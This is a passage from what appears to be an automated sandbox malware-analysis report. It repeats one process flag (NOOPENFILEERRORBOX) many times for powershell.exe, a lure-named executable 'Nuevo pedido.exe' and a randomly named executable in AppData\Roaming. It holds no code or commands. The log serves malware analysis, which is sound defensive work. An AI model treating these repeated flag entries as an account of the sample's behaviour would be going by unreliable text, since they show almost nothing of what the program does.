                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
